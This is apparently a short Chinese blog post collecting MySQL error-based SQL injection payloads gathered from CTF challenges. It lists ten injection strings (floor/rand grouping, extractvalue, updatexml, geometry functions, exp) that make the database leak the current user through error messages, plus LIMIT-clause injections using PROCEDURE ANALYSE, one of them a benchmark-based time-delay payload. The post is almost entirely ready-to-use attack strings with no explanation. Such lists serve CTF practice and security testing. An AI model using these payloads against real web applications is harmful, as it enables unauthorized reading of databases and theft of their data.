十种Mysql报错注入

某CTF收集的Mysql爆表、爆字段语句 - Coolbreeze - Coolbreezes Blog

一、

and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a)

二、

and (extractvalue(1,concat(0x5c,(select user()))));

三、

and (updatexml(1,concat(0x5e25,(select user()),0x5e25),1));

四、

and GeometryCollection((select * from(select * from(select user())a)b));

五、

and multipoint((select * from(select * from(select user())a)b));

六、

and polygon((select * from(select * from(select user())a)b));

七、

and multipolygon((select * from(select * from(select user())a)b));

八、

and linestring((select * from(select * from(select user())a)b));

九、

and multilinestring((select * from(select * from(select user())a)b));

十、

and exp(~(select * from(select user())a));

 

limit 注入

  报错注入

  1,1 PROCEDURE  analyse(extractvalue(rand(),concat(0x3a,version())),1) -- a

   时间

  1 procedure analyse(extractvalue(rand(),concat(0x3a,(if(1=1,benchmark(10000000,sha1(1)),1)))),1);

posted @ 2018-01-11 13:40  ashe666  阅读(259)  评论(0编辑  收藏  举报